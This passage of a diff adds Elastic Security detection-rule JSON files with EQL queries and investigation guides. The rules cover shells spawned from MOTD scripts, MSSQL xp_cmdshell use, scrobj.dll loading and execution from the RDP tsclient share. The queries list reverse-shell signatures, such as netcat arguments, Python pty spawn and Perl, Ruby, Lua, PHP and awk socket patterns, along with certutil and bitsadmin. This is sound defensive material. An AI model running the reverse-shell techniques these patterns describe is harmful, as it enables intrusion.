directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where event.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and (\n (process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\"))) or\n (process.name : (\"nc\", \"ncat\", \"netcat\", \"nc.openbsd\") and process.args_count >= 3 and \n not process.args : (\"-*z*\", \"-*l*\")) or\n (process.name : \"python*\" and process.args : \"-c\" and process.args : (\n \"*import*pty*spawn*\", \"*import*subprocess*call*\"\n )) or\n (process.name : \"perl*\" and process.args : \"-e\" and process.args : \"*socket*\" and process.args : (\n \"*exec*\", \"*system*\"\n )) or\n (process.name : \"ruby*\" and process.args : (\"-e\", \"-rsocket\") and process.args : (\n \"*TCPSocket.new*\", \"*TCPSocket.open*\"\n )) or\n (process.name : \"lua*\" and process.args : \"-e\" and process.args : \"*socket.tcp*\" and process.args : (\n \"*io.popen*\", \"*os.execute*\"\n )) or\n (process.name : \"php*\" and process.args : \"-r\" and process.args : \"*fsockopen*\" and process.args : \"*/bin/*sh*\") or \n (process.name : (\"awk\", \"gawk\", \"mawk\", \"nawk\") and process.args : \"*/inet/tcp/*\") or \n (process.name in (\"openssl\", \"telnet\"))\n) and \nnot (\n (process.parent.args : \"--force\") or\n (process.args : (\"/usr/games/lolcat\", \"/usr/bin/screenfetch\")) or\n (process.parent.name == \"system-crash-notification\")\n)\n", + "references": [ + "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4ec47004-b34a-42e6-8003-376a123ea447", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "4ec47004-b34a-42e6-8003-376a123ea447_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_110.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_110.json new file mode 100644 index 00000000000..60c1cadc910 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_110.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via MSSQL xp_cmdshell Stored Procedure", + "note": "## Triage and analysis\n\n### Investigating Execution via MSSQL xp_cmdshell Stored Procedure\n\nMicrosoft SQL Server (MSSQL) has procedures meant to extend its functionality, the Extended Stored Procedures. These procedures are external functions written in C/C++; some provide interfaces for external programs. This is the case for xp_cmdshell, which spawns a Windows command shell and passes in a string for execution. Attackers can use this to execute commands on the system running the SQL server, commonly to escalate their privileges and establish persistence.\n\nThe xp_cmdshell procedure is disabled by default, but when used, it has the same security context as the MSSQL Server service account, which is often privileged.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line to determine if the command executed is potentially harmful or malicious.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately, but it brings inherent risk. The security team must monitor any activity of it. If recurrent tasks are being executed using this mechanism, consider adding exceptions \u2014 preferably with a full command line.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that SQL servers are not directly exposed to the internet. If there is a business justification for such, use an allowlist to allow only connections from known legitimate sources.\n- Disable the xp_cmdshell stored procedure.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"sqlservr.exe\" and \n (\n (process.name : \"cmd.exe\" and \n not process.args : (\"\\\\\\\\*\", \"diskfree\", \"rmdir\", \"mkdir\", \"dir\", \"del\", \"rename\", \"bcp\", \"*XMLNAMESPACES*\", \n \"?:\\\\MSSQL\\\\Backup\\\\Jobs\\\\sql_agent_backup_job.ps1\", \"K:\\\\MSSQL\\\\Backup\\\\msdb\", \"K:\\\\MSSQL\\\\Backup\\\\Logins\")) or \n \n (process.name : \"vpnbridge.exe\" or ?process.pe.original_file_name : \"vpnbridge.exe\") or \n\n (process.name : \"certutil.exe\" or ?process.pe.original_file_name == \"CertUtil.exe\") or \n\n (process.name : \"bitsadmin.exe\" or ?process.pe.original_file_name == \"bitsadmin.exe\")\n )\n", + "references": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.001", + "name": "SQL Stored Procedures", + "reference": "https://attack.mitre.org/techniques/T1505/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "4ed493fc-d637-4a36-80ff-ac84937e5461_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_111.json b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_111.json new file mode 100644 index 00000000000..488be07ab86 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4ed493fc-d637-4a36-80ff-ac84937e5461_111.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via MSSQL xp_cmdshell Stored Procedure", + "note": "## Triage and analysis\n\n### Investigating Execution via MSSQL xp_cmdshell Stored Procedure\n\nMicrosoft SQL Server (MSSQL) has procedures meant to extend its functionality, the Extended Stored Procedures. These procedures are external functions written in C/C++; some provide interfaces for external programs. This is the case for xp_cmdshell, which spawns a Windows command shell and passes in a string for execution. Attackers can use this to execute commands on the system running the SQL server, commonly to escalate their privileges and establish persistence.\n\nThe xp_cmdshell procedure is disabled by default, but when used, it has the same security context as the MSSQL Server service account, which is often privileged.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line to determine if the command executed is potentially harmful or malicious.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n\n### False positive analysis\n\n- This mechanism can be used legitimately, but it brings inherent risk. The security team must monitor any activity of it. If recurrent tasks are being executed using this mechanism, consider adding exceptions \u2014 preferably with a full command line.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Ensure that SQL servers are not directly exposed to the internet. If there is a business justification for such, use an allowlist to allow only connections from known legitimate sources.\n- Disable the xp_cmdshell stored procedure.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"sqlservr.exe\" and \n (\n (process.name : \"cmd.exe\" and \n not process.args : (\"\\\\\\\\*\", \"diskfree\", \"rmdir\", \"mkdir\", \"dir\", \"del\", \"rename\", \"bcp\", \"*XMLNAMESPACES*\", \n \"?:\\\\MSSQL\\\\Backup\\\\Jobs\\\\sql_agent_backup_job.ps1\", \"K:\\\\MSSQL\\\\Backup\\\\msdb\", \"K:\\\\MSSQL\\\\Backup\\\\Logins\")) or \n \n (process.name : \"vpnbridge.exe\" or ?process.pe.original_file_name : \"vpnbridge.exe\") or \n\n (process.name : \"certutil.exe\" or ?process.pe.original_file_name == \"CertUtil.exe\") or \n\n (process.name : \"bitsadmin.exe\" or ?process.pe.original_file_name == \"bitsadmin.exe\")\n )\n", + "references": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.001", + "name": "SQL Stored Procedures", + "reference": "https://attack.mitre.org/techniques/T1505/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "4ed493fc-d637-4a36-80ff-ac84937e5461_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_107.json b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_107.json new file mode 100644 index 00000000000..c0d49a0b507 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_107.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies scrobj.dll loaded into unusual Microsoft processes. This usually means a malicious scriptlet is being executed in the target process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Script Object Execution", + "query": "any where host.os.type == \"windows\" and \n (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and \n (?dll.name : \"scrobj.dll\" or ?file.name : \"scrobj.dll\") and \n process.executable : (\"?:\\\\Windows\\\\System32\\\\*.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\*.exe\") and \n not process.executable : (\n \"?:\\\\Windows\\\\System32\\\\cscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cscript.exe\",\n \"?:\\\\Windows\\\\system32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\system32\\\\taskhostw.exe\",\n \"?:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\windows\\\\SysWOW64\\\\inetsrv\\\\w3wp.exe\",\n \"?:\\\\Windows\\\\system32\\\\wscript.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wscript.exe\",\n \"?:\\\\Windows\\\\System32\\\\mshta.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\System32\\\\cmd.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\cmd.exe\", \n \"?:\\\\Windows\\\\System32\\\\OpenWith.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WMIADAP.exe\",\n \"?:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.010", + "name": "Regsvr32", + "reference": "https://attack.mitre.org/techniques/T1218/010/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "4ed678a9-3a4f-41fb-9fea-f85a6e0a0dff_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_108.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_108.json new file mode 100644 index 00000000000..ac6819ac923 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_108.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via TSClient Mountpoint", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.executable : \"\\\\Device\\\\Mup\\\\tsclient\\\\*.exe\"\n", + "references": [ + "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "4fe9d835-40e1-452d-8230-17c147cafad8_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_109.json b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_109.json new file mode 100644 index 00000000000..92283183538 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/4fe9d835-40e1-452d-8230-17c147cafad8_109.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via TSClient Mountpoint", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and process.executable : \"\\\\Device\\\\Mup\\\\tsclient\\\\*.exe\"\n", + "references": [ + "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "4fe9d835-40e1-452d-8230-17c147cafad8", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "4fe9d835-40e1-452d-8230-17c147cafad8_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5124e65f-df97-4471-8dcb-8e3953b3ea97_2.json 